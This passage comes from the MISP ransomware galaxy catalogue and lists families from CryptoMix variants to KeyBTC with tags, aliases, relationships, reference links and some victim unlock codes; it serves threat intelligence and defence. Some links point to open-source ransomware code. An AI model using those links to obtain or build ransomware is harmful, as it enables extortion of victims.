• similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

**Table 5260. Table References**

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<tbody>
<tr>
<td><a href="http://www.nyxbone.com/malware/CryptoMix.html">http://www.nyxbone.com/malware/CryptoMix.html</a></td>
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<td><a href="https://twitter.com/demonslay335/status/1072227523755470848">https://twitter.com/demonslay335/status/1072227523755470848</a></td>
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<tr>
<td><a href="https://www.coveware.com/blog/cryptomix-ransomware-exploits-cancer-crowdfunding">https://www.coveware.com/blog/cryptomix-ransomware-exploits-cancer-crowdfunding</a></td>
</tr>
</tbody>
</table>

**CryptoRansomeware**

Ransomware

The tag is: *misp-galaxy:ransomware="CryptoRansomeware"*

CryptoRansomeware has relationships with:

• similar: misp-galaxy:malpedia="CryptoRansomeware" with estimative-language:likelihood-probability="likely"

**Table 5261. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/817672617658347521">https://twitter.com/malwrhunterteam/status/817672617658347521</a></td>
</tr>
</tbody>
</table>
CryptoRoger
Ransomware

The tag is: misp-galaxy:ransomware="CryptoRoger"

Table 5262. Table References

Links
https://id-ransomware.blogspot.com/2016/06/cryptoroger-aes-256-0.html

CryptoShadow
Ransomware

The tag is: misp-galaxy:ransomware="CryptoShadow"

Table 5263. Table References

Links
https://twitter.com/struppigel/status/821992610164277248

CryptoShocker
Ransomware

The tag is: misp-galaxy:ransomware="CryptoShocker"

Table 5264. Table References

Links
https://id-ransomware.blogspot.com/2016/06/cryptoshocker-ransomware-aes-200.html

CryptoTorLocker2015
Ransomware

The tag is: misp-galaxy:ransomware="CryptoTorLocker2015"

Table 5265. Table References

Links
CryptoTrooper

Ransomware

The tag is: misp-galaxy:ransomware="CryptoTrooper"

Table 5266. Table References

Links


CryptoWall 1

Ransomware, Infection by Phishing

The tag is: misp-galaxy:ransomware="CryptoWall 1"

CryptoWall 2

Ransomware

The tag is: misp-galaxy:ransomware="CryptoWall 2"

CryptoWall 3

Ransomware

The tag is: misp-galaxy:ransomware="CryptoWall 3"

Table 5267. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2015/01/13/crowti-update-cryptowall-3-0/

https://www.virustotal.com/en/file/45317968759d3e37282ceb75149f627d648534c5b4685f6da3966d8f6fca662d/analysis/

CryptoWall 4

Ransomware

The tag is: misp-galaxy:ransomware="CryptoWall 4"
**CryptXXX**

Ransomware Comes with Bedep

The tag is: misp-galaxy:ransomware="CryptXXX"

CryptXXX is also known as:

- CryptProjectXXX

CryptXXX has relationships with:

- similar: misp-galaxy:ransomware="CryptXXX 2.0" with estimative-language:likelihood-probability="likely"

*Table 5268. Table References*

<table>
<thead>
<tr>
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<tbody>
<tr>
<td><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></td>
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<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html">https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html</a></td>
</tr>
</tbody>
</table>

**CryptXXX 2.0**

Ransomware Locks screen. Ransom note names are an ID. Comes with Bedep.

The tag is: misp-galaxy:ransomware="CryptXXX 2.0"

CryptXXX 2.0 is also known as:

- CryptProjectXXX

CryptXXX 2.0 has relationships with:

- similar: misp-galaxy:ransomware="CryptXXX" with estimative-language:likelihood-probability="likely"

*Table 5269. Table References*

<table>
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</tr>
</tbody>
</table>
CryptXXX 3.0

Ransomware Comes with Bedep

The tag is: misp-galaxy:ransomware="CryptXXX 3.0"

CryptXXX 3.0 is also known as:

- UltraDeCrypter
- UltraCrypter

Table 5270. Table References

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<tbody>
<tr>
<td><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html">https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html</a></td>
</tr>
</tbody>
</table>

CryptXXX 3.1

Ransomware StilerX credential stealing

The tag is: misp-galaxy:ransomware="CryptXXX 3.1"

Table 5271. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html">https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html</a></td>
</tr>
</tbody>
</table>

CryPy

Ransomware

The tag is: misp-galaxy:ransomware="CryPy"

Table 5272. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/09/crypy-ransomware.html">https://id-ransomware.blogspot.com/2016/09/crypy-ransomware.html</a></td>
</tr>
</tbody>
</table>
CTB-Faker

Ransomware

The tag is: misp-galaxy:ransomware="CTB-Faker"

CTB-Faker is also known as:

- Citroni

Table 5273. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/07/ctb-faker-ransomware-008.html">https://id-ransomware.blogspot.com/2016/07/ctb-faker-ransomware-008.html</a></td>
</tr>
</tbody>
</table>

CTB-Locker WEB

Ransomware websites only

The tag is: misp-galaxy:ransomware="CTB-Locker WEB"

Table 5274. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://thisissecurity.net/2016/02/26/a-lockpicking-exercise/">https://thisissecurity.net/2016/02/26/a-lockpicking-exercise/</a></td>
</tr>
<tr>
<td><a href="https://github.com/eyecatchup/Critroni-php">https://github.com/eyecatchup/Critroni-php</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/ctb-locker-for-websites-04.html">https://id-ransomware.blogspot.com/2016/06/ctb-locker-for-websites-04.html</a></td>
</tr>
</tbody>
</table>

CuteRansomware

Ransomware Based on my-Little-Ransomware

The tag is: misp-galaxy:ransomware="CuteRansomware"

CuteRansomware is also known as:

- my-Little-Ransomware

Table 5275. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://github.com/aaaddress1/my-Little-Ransomware/tree/master/decryptoTool">https://github.com/aaaddress1/my-Little-Ransomware/tree/master/decryptoTool</a></td>
</tr>
<tr>
<td><a href="https://github.com/aaaddress1/my-Little-Ransomware">https://github.com/aaaddress1/my-Little-Ransomware</a></td>
</tr>
</tbody>
</table>

Cyber SpLiTTer Vbs

Ransomware Based on HiddenTear
The tag is: misp-galaxy:ransomware="Cyber SpLiTTer Vbs"

Cyber SpLiTTer Vbs is also known as:

- CyberSplitter

Cyber SpLiTTer Vbs has relationships with:

- similar: misp-galaxy:malpedia="CyberSplitter" with estimative-language:likelihood-probability="likely"

Table 5276. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/struppigel/status/778871886616862720">https://twitter.com/struppigel/status/778871886616862720</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/struppigel/status/806758133720698881">https://twitter.com/struppigel/status/806758133720698881</a></td>
</tr>
</tbody>
</table>

Death Bitches

Ransomware

The tag is: misp-galaxy:ransomware="Death Bitches"

Table 5277. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/JaromirHorejsi/status/815555258478981121">https://twitter.com/JaromirHorejsi/status/815555258478981121</a></td>
</tr>
</tbody>
</table>

DeCrypt Protect

Ransomware

The tag is: misp-galaxy:ransomware="DeCrypt Protect"

Table 5278. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>

DEDCryptor

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="DEDCryptor"

Table 5279. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>
**Demo**

Ransomware only encrypts .jpg files

The tag is: **misp-galaxy:ransomware=“Demo”**

Demo is also known as:

- CryptoDemo

---

**DetoxCrypto**

Ransomware - Based on Detox: Calipso, We are all Pokemons, Nullbyte

The tag is: **misp-galaxy:ransomware=“DetoxCrypto”**

---

**Digisom**

Ransomware

The tag is: **misp-galaxy:ransomware=“Digisom”**
**DirtyDecrypt**

Ransomware

The tag is: `misp-galaxy:ransomware="DirtyDecrypt"`

*Table 5283. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/demonslay335/status/752586334527709184">https://twitter.com/demonslay335/status/752586334527709184</a></td>
</tr>
</tbody>
</table>

**DMALocker**


The tag is: `misp-galaxy:ransomware="DMALocker"`

*Table 5284. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></td>
</tr>
<tr>
<td><a href="https://github.com/hasherezade/dma_unlocker">https://github.com/hasherezade/dma_unlocker</a></td>
</tr>
<tr>
<td><a href="https://drive.google.com/drive/folders/0Bzb5kQFOXkiSMm94QzdyM3hCdDg">https://drive.google.com/drive/folders/0Bzb5kQFOXkiSMm94QzdyM3hCdDg</a></td>
</tr>
</tbody>
</table>

**DMALocker 3.0**

Ransomware

The tag is: `misp-galaxy:ransomware="DMALocker 3.0"`

*Table 5285. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://drive.google.com/drive/folders/0Bzb5kQFOXkiSMm94QzdyM3hCdDg">https://drive.google.com/drive/folders/0Bzb5kQFOXkiSMm94QzdyM3hCdDg</a></td>
</tr>
<tr>
<td><a href="https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-strikes-back/">https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-strikes-back/</a></td>
</tr>
</tbody>
</table>

**DNRansomware**

Ransomware Code to decrypt: 83KYG9NW-3K39V-2T3HJ-93F3Q-GT

The tag is: `misp-galaxy:ransomware="DNRansomware"`

*Table 5286. Table References*
Domino
Ransomware Based on Hidden Tear

The tag is: misp-galaxy:ransomware="Domino"

Table 5287. Table References

DoNotChange
Ransomware

The tag is: misp-galaxy:ransomware="DoNotChange"

Table 5288. Table References

DummyLocker
Ransomware

The tag is: misp-galaxy:ransomware="DummyLocker"

Table 5289. Table References

DXXD
Ransomware

The tag is: misp-galaxy:ransomware="DXXD"
HiddenTear

Ransomware Open sourced C#

The tag is: misp-galaxy:ransomware="HiddenTear"

HiddenTear is also known as:

- Cryptear
- EDA2
- Hidden Tear

HiddenTear has relationships with:

- similar: misp-galaxy:malpedia="EDA2" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="HiddenTear" with estimative-language:likelihood-probability="likely"

EduCrypt

Ransomware Based on Hidden Tear

The tag is: misp-galaxy:ransomware="EduCrypt"

EduCrypt is also known as:

- EduCrypter
EiTest

Ransomware

The tag is: misp-galaxy:ransomware="EiTest"

El-Polocker

Ransomware Has a GUI

The tag is: misp-galaxy:ransomware="El-Polocker"

El-Polocker is also known as:

• Los Pollos Hermanos

Encoder.xxxx

Ransomware Coded in GO

The tag is: misp-galaxy:ransomware="Encoder.xxxx"

Encoder.xxxx is also known as:

• Trojan.Encoder.6491

Encoder.xxxx has relationships with:

• similar: misp-galaxy:ransomware="Windows_Security Ransonware" with estimative-language:likelihood-probability="likely"
**encryptoJJS**

Ransomware

The tag is: *misp-galaxy:ransomware="encryptoJJS"*

*Table 5296. Table References*

**Enigma**

Ransomware

The tag is: *misp-galaxy:ransomware="Enigma"*

*Table 5297. Table References*

**Enjey**

Ransomware Based on RemindMe

The tag is: *misp-galaxy:ransomware="Enjey"*

*Table 5298. Table References*

**Fairware**

Ransomware Target Linux O.S.

The tag is: *misp-galaxy:ransomware="Fairware"*

*Table 5299. Table References*
Fakben
Ransomware Based on Hidden Tear

The tag is: `misp-galaxy:ransomware="Fakben"`

Table 5300. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/07/fakben-team-ransomware-aes-256-1505.html">https://id-ransomware.blogspot.com/2016/07/fakben-team-ransomware-aes-256-1505.html</a></td>
</tr>
</tbody>
</table>

FakeCryptoLocker
Ransomware

The tag is: `misp-galaxy:ransomware="FakeCryptoLocker"`

Table 5301. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/PolarToffee/status/812312402779836416">https://twitter.com/PolarToffee/status/812312402779836416</a></td>
</tr>
</tbody>
</table>

Fantom
Ransomware Based on EDA2

The tag is: `misp-galaxy:ransomware="Fantom"`

Fantom is also known as:

- Comrad Circle

Table 5302. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>

FenixLocker
Ransomware

The tag is: `misp-galaxy:ransomware="FenixLocker"`
FILE FROZR

Ransomware RaaS

The tag is: misp-galaxy:ransomware="FILE FROZR"

FILE FROZR is also known as:

• FileFrozr

FileLocker

Ransomware

The tag is: misp-galaxy:ransomware="FileLocker"

FireCrypt

Ransomware

The tag is: misp-galaxy:ransomware="FireCrypt"

FireCrypt has relationships with:

• similar: misp-galaxy:malpedia="FireCrypt" with estimative-language:likelihood-probability="likely"
Flyper

Ransomware Based on EDA2 / HiddenTear

The tag is: `misp-galaxy:ransomware="Flyper"`

Table 5307. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/773771485643149312">https://twitter.com/malwrhunterteam/status/773771485643149312</a></td>
</tr>
</tbody>
</table>

Fonco

Ransomware contact email safefiles32@mail.ru also as prefix in encrypted file contents

The tag is: `misp-galaxy:ransomware="Fonco"`

FortuneCookie

Ransomware

The tag is: `misp-galaxy:ransomware="FortuneCookie"`

Table 5308. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="https://twitter.com/struppigel/status/842302481774321664">https://twitter.com/struppigel/status/842302481774321664</a></td>
</tr>
</tbody>
</table>

Free-Freedom

Ransomware Unlock code is: adam or adamdude9

The tag is: `misp-galaxy:ransomware="Free-Freedom"`

Free-Freedom is also known as:

- Roga

Free-Freedom has relationships with:

- similar: `misp-galaxy:ransomware="Roga"` with `estimative-language:likelihood-probability="likely"`
**FSociety**

Ransomware Based on EDA2 and RemindMe

The tag is: `misp-galaxy:ransomware="FSociety"`

**Table 5310. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/siri">https://twitter.com/siri</a> urz/status/795969998707720193</td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/08/fsociety-ransomware.html">https://id-ransomware.blogspot.com/2016/08/fsociety-ransomware.html</a></td>
</tr>
</tbody>
</table>

**Fury**

Ransomware

The tag is: `misp-galaxy:ransomware="Fury"`

**Table 5311. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></td>
</tr>
</tbody>
</table>

**GhostCrypt**

Ransomware Based on Hidden Tear

The tag is: `misp-galaxy:ransomware="GhostCrypt"`

**Table 5312. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://download.bleepingcomputer.com/demonslay335/GhostCryptDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/GhostCryptDecrypter.zip</a></td>
</tr>
<tr>
<td><a href="http://www.bleepingcomputer.com/forums/t/614197/ghostcrypt-z81928819-help-support-topic-read-this-filetxt/">http://www.bleepingcomputer.com/forums/t/614197/ghostcrypt-z81928819-help-support-topic-read-this-filetxt/</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/05/ghostcrypt-ransomware-aes-256-2-bitcoins.html">https://id-ransomware.blogspot.com/2016/05/ghostcrypt-ransomware-aes-256-2-bitcoins.html</a></td>
</tr>
</tbody>
</table>
**Gingerbread**

Ransomware

The tag is: `misp-galaxy:ransomware="Gingerbread"`

**Globe v1**

Ransomware

The tag is: `misp-galaxy:ransomware="Globe v1"`

Globe v1 is also known as:

- Purge

**GNL Locker**

Ransomware Only encrypts DE or NL country. Variants, from old to latest: Zyklon Locker, WildFire locker, Hades Locker

The tag is: `misp-galaxy:ransomware="GNL Locker"`

GNL Locker has relationships with:

- similar: `misp-galaxy:ransomware="Zyklon"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="Zyklon"` with `estimative-language:likelihood-probability="likely"`

Table 5313. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/ni_fi_70/status/796353782699425792">https://twitter.com/ni_fi_70/status/796353782699425792</a></td>
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Table 5314. Table References

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Table 5315. Table References

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<th>Links</th>
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</table>
Gomasom
Ransomware
The tag is: `misp-galaxy:ransomware="Gomasom"`

Table 5316. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/05/gomasom-ransonware.html">http://id-ransomware.blogspot.com/2016/05/gomasom-ransonware.html</a></td>
</tr>
</tbody>
</table>

Goopic
Ransomware
The tag is: `misp-galaxy:ransomware="Goopic"`

Table 5317. Table References

<table>
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<th>Links</th>
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</table>

Gopher
Ransomware OS X ransomware (PoC)
The tag is: `misp-galaxy:ransomware="Gopher"`

Hacked
Ransomware Jigsaw Ransomware variant
The tag is: `misp-galaxy:ransomware="Hacked"`

Table 5318. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/demonslay335/status/806878803507101696">https://twitter.com/demonslay335/status/806878803507101696</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/12/hackedlocker-ransomware.html">http://id-ransomware.blogspot.com/2016/12/hackedlocker-ransomware.html</a></td>
</tr>
</tbody>
</table>

HappyDayzz
Ransomware
The tag is: `misp-galaxy:ransomware="HappyDayzz"`

**Table 5319. Table References**

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/847114064224497666">https://twitter.com/malwrhunterteam/status/847114064224497666</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2017/03/happydayzz-blackjocker-ransomware.html">http://id-ransomware.blogspot.com/2017/03/happydayzz-blackjocker-ransomware.html</a></td>
</tr>
</tbody>
</table>

**Harasom**

Ransomware

The tag is: `misp-galaxy:ransomware="Harasom"`

**Table 5320. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></td>
</tr>
</tbody>
</table>

**HDDCryptor**

Ransomware Uses https://diskcryptor.net for full disk encryption

The tag is: `misp-galaxy:ransomware="HDDCryptor"`

HDDCryptor is also known as:

- Mamba

HDDCryptor has relationships with:

- similar: `misp-galaxy:malpedia="Mamba"` with `estimative-language:likelihood-probability="likely"`

**Table 5321. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.linkedin.com/pulse/mamba-new-full-disk-encryption-ransomware-family-member-marinho">https://www.linkedin.com/pulse/mamba-new-full-disk-encryption-ransomware-family-member-marinho</a></td>
</tr>
</tbody>
</table>

**Heimdall**

Ransomware File marker: "Heimdall---"
The tag is: misp-galaxy:ransomware="Heimdall"

**Table 5322. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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</table>

**Help_dcfile**

Ransomware

The tag is: misp-galaxy:ransomware="Help_dcfile"

**Table 5323. Table References**

<table>
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<th>Links</th>
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</table>

**Herbst**

Ransomware

The tag is: misp-galaxy:ransomware="Herbst"

Herbst has relationships with:

- similar: misp-galaxy:malpedia="Herbst" with estimative-language:likelihood-probability="likely"

**Table 5324. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware">https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/herbst-autumn-ransomware-aes-256-01.html">https://id-ransomware.blogspot.com/2016/06/herbst-autumn-ransomware-aes-256-01.html</a></td>
</tr>
</tbody>
</table>

**Hi Buddy!**

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Hi Buddy!"

**Table 5325. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://id-ransomware.blogspot.ru/2016/05/hi-buddy-ransomware-aes-256-0.html">http://id-ransomware.blogspot.ru/2016/05/hi-buddy-ransomware-aes-256-0.html</a></td>
</tr>
</tbody>
</table>
**Hitler**

Ransomware Deletes files

The tag is: `misp-galaxy:ransomware="Hitler"`

Table 5326. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/jiriatvirlab/status/825310545800740864">https://twitter.com/jiriatvirlab/status/825310545800740864</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/08/hitler-ransomware.html">http://id-ransomware.blogspot.com/2016/08/hitler-ransomware.html</a></td>
</tr>
</tbody>
</table>

**HolyCrypt**

Ransomware

The tag is: `misp-galaxy:ransomware="HolyCrypt"`

HolyCrypt has relationships with:

- similar: `misp-galaxy:ransomware="Dablio Ransomware"` with estimative-language:likelihood-probability="likely"

Table 5327. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/07/holycrypt-ransomware.html">https://id-ransomware.blogspot.com/2016/07/holycrypt-ransomware.html</a></td>
</tr>
</tbody>
</table>

**HTCryptor**

Ransomware Includes a feature to disable the victim’s windows firewall Modified in-dev

HiddenTear

The tag is: `misp-galaxy:ransomware="HTCryptor"`

Table 5328. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/BleepinComputer/status/803288396814839808">https://twitter.com/BleepinComputer/status/803288396814839808</a></td>
</tr>
</tbody>
</table>

**HydraCrypt**

Ransomware CrypBoss Family
The tag is: **misp-galaxy:ransomware="HydraCrypt"**

**Table 5329. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></td>
</tr>
<tr>
<td><a href="http://www.malware-traffic-analysis.net/2016/02/03/index2.html">http://www.malware-traffic-analysis.net/2016/02/03/index2.html</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/hydracrypt-ransomware-aes-256-cbc-rsa.html">https://id-ransomware.blogspot.com/2016/06/hydracrypt-ransomware-aes-256-cbc-rsa.html</a></td>
</tr>
</tbody>
</table>

**iLock**

Ransomware

The tag is: **misp-galaxy:ransomware="iLock"**

**Table 5330. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/BleepinComputer/status/817085367144873985">https://twitter.com/BleepinComputer/status/817085367144873985</a></td>
</tr>
</tbody>
</table>

**iLockLight**

Ransomware

The tag is: **misp-galaxy:ransomware="iLockLight"**

**International Police Association**

Ransomware CryptoTorLocker2015 variant

The tag is: **misp-galaxy:ransomware="International Police Association"**

**Table 5331. Table References**

<table>
<thead>
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<th>Links</th>
</tr>
</thead>
</table>

**iRansom**

Ransomware

The tag is: **misp-galaxy:ransomware="iRansom"**

**Table 5332. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/demonslay335/status/796134264744083460">https://twitter.com/demonslay335/status/796134264744083460</a></td>
</tr>
</tbody>
</table>
JagerDecryptor

Ransomware Prepends filenames

The tag is: `misp-galaxy:ransomware="JagerDecryptor"`

Table 5333. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/JakubKroustek/status/757873976047697920">https://twitter.com/JakubKroustek/status/757873976047697920</a></td>
</tr>
</tbody>
</table>

Jeiphoos

Ransomware Windows, Linux. Campaign stopped. Actor claimed he deleted the master key.

The tag is: `misp-galaxy:ransomware="Jeiphoos"`

Jeiphoos is also known as:

- Encryptor RaaS
- Sarento

Table 5334. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://www.nyxbone.com/malware/RaaS.html">http://www.nyxbone.com/malware/RaaS.html</a></td>
</tr>
</tbody>
</table>

Jhon Woddy

Ransomware Same codebase as DNRansomware Lock screen password is M3VZ>5BwGGVH

The tag is: `misp-galaxy:ransomware="Jhon Woddy"`

Table 5335. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://download.bleepingcomputer.com/demonslay335/DoNotOpenDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/DoNotOpenDecrypter.zip</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/BleepinComputer/status/822509105487245317">https://twitter.com/BleepinComputer/status/822509105487245317</a></td>
</tr>
</tbody>
</table>

Jigsaw

Ransomware Has a GUI

The tag is: `misp-galaxy:ransomware="Jigsaw"`
Jigsaw is also known as:

• CryptoHitMan
• Jigsaw Original

Jigsaw has relationships with:

• similar: misp-galaxy:malpedia="Jigsaw" with estimative-language:likelihood-probability="likely"

Table 5336. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td>[3] <a href="https://twitter.com/demonslay335/status/795819556166139905">https://twitter.com/demonslay335/status/795819556166139905</a></td>
</tr>
</tbody>
</table>

**Job Crypter**

Ransomware Based on HiddenTear, but uses TripleDES, decrypter is PoC

The tag is: `misp-galaxy:ransomware="Job Crypter"`

Job Crypter is also known as:

• JobCrypter

Table 5337. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td>[3] <a href="https://twitter.com/malwrhunterteam/status/828914052973858816">https://twitter.com/malwrhunterteam/status/828914052973858816</a></td>
</tr>
</tbody>
</table>

**JohnyCryptor**

Ransomware

The tag is: `misp-galaxy:ransomware="JohnyCryptor"`

Table 5338. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
</table>
**KawaiiLocker**

Ransomware

The tag is: `misp-galaxy:ransomware="KawaiiLocker"`

*Table 5339. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://safezone.cc/resources/kawaii-decryptor.195/">https://safezone.cc/resources/kawaii-decryptor.195/</a></td>
</tr>
</tbody>
</table>

**KeRanger**

Ransomware OS X Ransomware

The tag is: `misp-galaxy:ransomware="KeRanger"`

KeRanger has relationships with:

- similar: `misp-galaxy:malpedia="KeRanger"` with `estimative-language:likelihood-probability="likely"`

*Table 5340. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://news.drweb.com/show/?i=9877&amp;lng=en&amp;c=5">http://news.drweb.com/show/?i=9877&amp;lng=en&amp;c=5</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/03/keranger-ransomware.html">https://id-ransomware.blogspot.com/2016/03/keranger-ransomware.html</a></td>
</tr>
</tbody>
</table>

**KeyBTC**

